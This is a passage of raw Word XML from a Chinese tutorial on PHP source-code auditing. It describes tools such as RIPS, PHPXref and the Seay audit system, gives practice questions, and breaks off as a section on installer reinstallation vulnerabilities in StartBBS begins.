        </w:rPr>
        <w:t>“用户输入的一切数据都有害”，大部分的注入漏洞，包括二次注入，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi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究其原因都是因为对用户的输入数据没有做好过滤，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">RIPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对这些敏感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数据进行跟踪，并判断其在进入敏感函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(mysql_query())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>之前有没有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对其进行有效处理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(addslashes())</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>来判断这条数据流是否存在漏洞。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动态扫描加上静态定位，最终使我们能更容易的发现一些漏洞并及时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使其得到修补。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="10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sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3.PHPXref</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:b/>
          <w:sz w:val="12"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="1" w:line="361" w:lineRule="exact"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>官方网站：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>phpxref.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317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严格的说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHPxref </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>也是做开发的好帮手，它能将某一个程序（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wordpre</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）中所有的函数、变量、常量等分类记录，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生成一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>网页列表，你可以轻松地在这个列表中找到某个函数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在什么位置被定义，在什么位置被引用。所以说非常适合大型项目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="360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56"/>
        <w:ind w:left="417" w:right="317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lastRenderedPageBreak/>
        <w:t>同时还是最主要的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>It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’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s free.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2"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="14"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Seay </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>源代码审计系统</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="13"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:b/>
          <w:sz w:val="13"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:ind w:left="837" w:hanging="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>官网</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:hyperlink r:id="rId16">
        <w:r>
          <w:rPr>
            <w:lang w:eastAsia="zh-CN"/>
          </w:rPr>
          <w:t>www.cnseay.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这是一款结合</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>白盒跟</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:w w:val="95"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>黑盒的半自动化国产代码安全审计系统。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="279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该版本只支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，近期会加上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> ASPX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">JSP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的代码审计功能，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并且实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>套规则的配置，另外还会加上自定义审计的扩展名，方便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灵活审计不同脚本代码。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sz w:val="16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别外两款开源的代码审计工具</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="35"/>
        <w:ind w:left="537" w:right="317" w:hanging="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>https://github.com/dpnishant/raptor</w:t>
      </w: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spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="34"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="464" w:firstLine="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://dpnishant.github.io/raptor/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:w w:val="95"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>https://github.com/wufeifei/cobra/</w:t>
      </w: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rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="26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练习题：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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spacing w:before="76" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="3263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w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>（）下列哪一种语法必须设置？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</w:rPr>
        <w:t>A.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>?php code; ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="342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B.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">? </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>; ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="18" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="2342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C.&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>script language="php"&gt; Code; &lt;/script&gt; D.&lt;% Code; %&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="4408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() php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是那种类型的语言</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>编译型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="538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B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解释型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>两</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>都</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>都是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D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>两都</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>都</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不是</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN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$_POST $_GET $_REQUEST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>含义？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="2" w:line="1080" w:lineRule="atLeast"/>
        <w:ind w:left="417" w:right="326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什么是代码审计？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代码审计需要会开发吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="17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在我遇到的一些人中，有些说要有些说不需要，这里不评论。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可在我</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> qq </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>空间留言</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>你息怕想法</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，千万不要因为别人说什么就是什么。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3"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="23"/>
          <w:lang w:eastAsia="zh-CN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搭一个自己的代码审计环境。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="9"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:line="540" w:lineRule="exact"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="重装漏洞"/>
      <w:bookmarkStart w:id="14" w:name="_bookmark6"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>重装漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先拿到一份源码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>肯定是先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>上。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>而在安装文件上又会经</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>常出现问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="464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其他的基本都是通过生成一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> lock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件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来判断程序是否安装过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了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如果存在这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> lock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件了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就会退出了。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这里首先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先来说</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一下安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装文件经常出现的问题。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6"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri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开源轻论坛</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:spacing w:val="-88"/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">StartBBS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
